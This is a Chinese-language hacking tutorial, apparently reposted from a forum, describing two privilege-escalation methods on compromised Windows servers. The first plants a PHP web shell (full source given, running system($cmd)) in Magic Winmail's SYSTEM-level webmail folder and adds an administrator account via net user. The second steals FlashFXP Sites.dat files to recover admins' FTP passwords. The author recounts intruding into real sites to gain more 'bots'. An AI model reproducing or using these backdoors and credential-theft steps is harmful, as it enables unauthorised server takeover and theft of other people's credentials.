另种提升权限方法

一．使用Magic Winmail 来提升权限

原创:lis0
环境:所有使用了Magic Winmail软件的服务器，前提你已经得到了一个webshell :)

Magic Winmail是一款很不错的mail server 软件，深受不少网站的青睐。主要是一些中小的网站。但是在笔者最近的一次渗透中发现，装有改软件的服务器，如果一旦被入侵者得到webshell就可以通过这个软件来提升权限，非常危险。
装有Magic Winmail的服务器会在系统上开启8080端口，对外提供邮件服务。使用过它的人应该知道。这个Magic Winmail服务器支持php脚本解析。图1
http://www.bjtaekwondo.org.cn/liso/data/upfile/51_3_1089427435.gif
在装有Magic Winmail的文件夹下有
一个server的文件夹，其下有webmail文件夹。图2
http://www.bjtaekwondo.org.cn/liso/data/upfile/52_3_1089427458.gif
大家可以发现这个文件夹下是一些php脚本的文件。因为Magic Winmail这个软件可以解析php脚本，也真是我们利用这个漏洞来提升权限的得力帮手。发现这个方法实属偶然，本来我想在这个服务器上装个后门，怎么装呢? 由于本人思路比较怪。一般不会使用常规的方法，就在这个服务器8080端口上打主意了。这个Magic Winmail就是最佳地点。你在d:\MagicW~1\server\webmail[我测试的机器上的物理路径]文件下随便放置php脚本，不管是脚本注入式的还是普通的php脚本，随便放! 而且lis0提示请放心大胆使用，不会有日志吗? 菜鸟了吧。一般系统被入侵，管理员到系统盘下又是md5校验又是脚本木马查杀的。他做梦也想不到我们的脚本会放在这个文件夹下，lis0推荐使用注入式的脚本或者是自己写的不被杀毒软件能K的脚本。我哪个脚本? Lis0使用的是angel写的一个up.php，又插入了一点东西。玩的时候，上传个自己修改过的脚本或者其它东东，很方便。日志呢?当然还是有的。不过还是在Magic Winmail文件夹下，到目前为止能到这个文件夹下查看日志的网管还真的是不多，除非看了这篇文章 :)
up.php的codz
<?
if ($id=="1"){
system($cmd);
show_source($file);
copy($a,$b);unlink($a);
}
?>
<?
$fname = $_FILES['MyFile']['name'];
$do = copy($_FILES['MyFile']['tmp_name'],$fname);
if ($do)
{
echo"上传成功<p>";
echo "http://".$SERVER_NAME."".dirname($PHP_SELF)."/".$fname."";
} else {
echo "上传失败";
}
?>
<form ENCTYPE="multipart/form-data" ACTION="<?php echo"".$PHP_SELF.""; ?>" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE="提交" TYPE="submit">
</from>
其实我们可以将如下的代码插入到Magic Winmail的index.php文件中去，它的功能已经构多了。加上lis0发现的漏洞。这就算是个最完美的后门了。
<?
if ($id=="1"){
system($cmd);
show_source($file);
copy($a,$b);unlink($a);
}
?>
我们使用http://www.target.com:8080/index.php?id=1&YY＝XX 就可以正大光明地访问我们的肉鸡了。好像这样做太黑了点:)
还没说漏洞呢?废话多了。将一个php的脚本放在d:\MagicW~1\server\webmail下，图3
http://www.bjtaekwondo.org.cn/liso/data/upfile/53_3_1089427486.gif
然后正大光明地 net user lis0 lis0 /add & net localgroup administrators lis0 /add 这个就是哥们发现的漏洞，不相信, 让肉鸡来证明我说的是没错的啊。图4
http://www.bjtaekwondo.org.cn/liso/data/upfile/54_3_1089427600.gif
lis0"非常不情愿"给告诉你这个webshell是system级别的而不是你那个guest级别的东西。虽然同是webshell待遇却不同啊。至于你想要玩其它的东东的话，使用上面我提起的up.php上传应该是不成问题的。然后在脚本的那个可爱的小框框中执行就ok了
如果使用asp脚本可以提升限权吗? 也放在Magic Winmail那个文件夹下。
我们可以分析一下如果Magic Winmail可以同时解析php和asp脚本的话，应该是可以的。不好意思Magic Winmail是不可以解析asp脚本的，Magic Winmail这边是php的世界。
我们这边简单地分析一个这个漏洞是如何产生的?我们可爱的网管在装Magic Winmail的时候肯定是以system级别的身份装的。当然Magic Winmail就继承了system级别的限权，而我们的Magic Winmail却可以解析php脚本，想当然我们可爱的php脚本就是system级别的脚本了。这个Magic Winmail软件有点像咱国产Netbox的味道。
看看我们分析的对不对，于是我上传了个php探针，看看它到底是怎么回事情。
图5 http://www.bjtaekwondo.org.cn/liso/data/upfile/56_3_1089427756.gif
看到了没~乖乖
system级别的 & 而且无被禁函数 & 允许/最大 32M & lis0高兴ing。我个人认为这个一个最完美的php脚本后门放置地点，随意发挥你的php才华。好了就这么多了，希望能对大家渗透有所帮助。


解决方法:将Magic Winmail所在盘作相应处理，限制guest限权的用户访问。
声明：由于该方法对于不少人来说可谓是一大惊喜，放置后门加提升限权可能带来不良影响。所作的测试的脚本已经完全删除。无聊人士请勿对号入座。


二．使用FlashFXP来提升权限

作者： lis0

最近各位一定得到不少肉鸡吧:)，从前段时间的动网的upfile漏洞， 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎，大家的方法也不过是使用一下asp脚本的后门罢了。至于提升权限的问题 呵呵，很少有人能作一口气完成。关键还是在提升权限上做个问题上，不少服务器设置的很BT，你的asp木马可能都用不了，还那里来的提升啊。我们得到webshell也就是个低级别的用户的权限，各种提升权限方法是可谓五花八门啊，如何提升就看你自己的妙招了。
其一，如果服务器上有装了pcanywhere服务端，管理员为了便于管理也给了我们方便，到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。
其二，如果对方有Serv-U大家不要骂我啊，通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问题吧。
其三，通过替换系统服务来提升。
其四，查找conn和config这类型的文件看能否得到sa或者mysql的相关密码，可能会有所收获等等。
本人在一次无聊的入侵过程中发现了这个方法，使用Flashfxp也能提升权限，但是成功率高不高就看你自己的运气了:)
本人在www.xxx.com 通过bbs得到了一个webshell，放了个小马(现在海阳的名气太大了偶不敢放)，而且已经将一段代码插入了N个文件中，够黑吧。提升权限没时间做。在我放假回家后，一看我晕bbs升级到动网sp2了我放的小马也被K了，人家的BBS是access版本的。郁闷啊！突然想起我将一个页面插入了asp的后门，看看还有没有希望了。输入www.xxx.com/xx.asp?id=1 好家伙，还在！高兴ing
图1
于是上传了一个asp的脚本的后门，怎么提升权限呢?
在这个网站的主机上游荡了N分钟，在C:\ Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2，于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名，而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中，替换我本地的相应文件会怎么样呢?
于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp在站点中打开站点管理器一项。乖 乖发财了
对方管理员通过flashfxp连接的各个站点都在图3，点击连接。通过了于是我们又有了一堆肉鸡，我们有ftp权限。上传脚本木马~ 呵呵。
说了半天这提升权限的事情一点没讲啊
不要急，大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。可惜啊！
又想起了在Sites.dat中也显示了密码和用户名，而且密码是加密的。
现在的星号密码会不会也是加了密的?看看就行了呗。
怎么看? 菜鸟了吧 手头有个不错的查看星号的软件，就是xp星号密码查看器，通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧
下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码，还真有点怀念当年玩sniff的时光。呵呵
密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密码和用户名已经作了必要的修改)
这么多的信息，按社会工程学的概念来说，没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到的。
我想这个问题应该反馈到flashfxp官方，让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到flashfxp的时候能想到这个方法，至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。

本人有些电脑基础，但不懂编程，是不是要从c语言开始？？／